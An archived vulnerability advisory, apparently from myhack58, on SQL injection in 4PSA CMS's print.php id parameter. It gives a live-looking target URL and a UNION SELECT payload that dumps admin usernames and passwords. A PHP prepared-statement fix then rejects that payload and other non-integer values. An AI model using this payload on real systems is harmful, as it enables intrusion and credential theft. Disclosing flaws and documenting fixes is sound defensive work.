4PSA CMS SQL injection flaws and fixes

ID MYHACK58:62201233155
Type myhack58
Reporter Anonymous
Modified 2012-02-20T00:00:00


Title: 4PSA CMS SQL Injection Vulnerabilities

Author: #BHG Security Center www.2cto.com Nitrojen90

Vendor website: http://www.4psa.com/

Affected version: latest version

Risk level: high

Testing platform: GNU/Linux - Windows


http://www.badguest.cn/print.php?id=[SQL]

Supplying the code below as the value of print.php?id= and pressing Enter shows all admin user names and passwords.

Eval Code : NULL UNION+SelEct+group_concat(uname,0x3a,pwd),2+FROM user--


Mr. XHat - Bl4ck. Viper - Dj. TiniVini

Fix:

Filter the id input parameter of the print.php page.
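
One way to implement that filter, shown as an added example (not 4PSA's code and not part of the original advisory): the id is accepted only if it is a positive integer, and it reaches the database as a bound parameter. The function name fetch_page() and the pages table with its columns are hypothetical, and an in-memory SQLite database is constructed so the example runs offline.

```php
<?php
declare(strict_types=1);

// Vulnerable pattern this replaces (hypothetical):
//   "SELECT ... FROM pages WHERE id = " . $_GET['id']

// Hypothetical helper: returns the page row for a valid id, or null.
function fetch_page(PDO $db, $rawId): ?array
{
    // 1. Allow-list validation: id must be a positive integer and nothing else.
    $id = filter_var($rawId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return null; // reject outright instead of trying to clean the value
    }
    // 2. Bound parameter: the value never becomes part of the SQL text.
    $stmt = $db->prepare('SELECT id, title, body FROM pages WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Constructed in-memory database (sample data, not from the advisory).
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE pages (id INTEGER PRIMARY KEY, title TEXT, body TEXT)');
$db->exec("INSERT INTO pages (title, body) VALUES ('Welcome', 'Hello')");

// Constructed inputs: a valid id, the non-numeric string quoted in the
// advisory, a second non-numeric value, and an empty value.
$inputs = [
    '1',
    'NULL UNION+SelEct+group_concat(uname,0x3a,pwd),2+FROM user--',
    '1 OR 1=1',
    '',
];
foreach ($inputs as $in) {
    $row = fetch_page($db, $in);
    printf("%-20.20s => %s\n", $in, $row === null ? 'rejected / not found' : $row['title']);
}

// In a print.php-style page the call would look like:
//   $row = fetch_page($db, $_GET['id'] ?? null);
//   if ($row === null) { http_response_code(404); exit; }
```

Only the first input returns a row; every non-integer value is rejected before any query is prepared.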